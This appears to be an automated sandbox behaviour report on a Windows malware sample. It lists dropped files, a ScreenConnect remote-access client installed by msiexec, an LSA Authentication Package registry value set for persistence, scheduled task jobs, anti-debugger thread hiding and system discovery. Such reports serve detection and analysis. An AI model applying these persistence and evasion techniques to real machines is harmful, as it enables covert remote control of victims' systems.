File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\hoalmz5c.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\hoalmz5c.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI44BF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4685.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f784339.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f784338.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI448F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f784338.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f784339.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f78433b.msi C:\Windows\system32\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
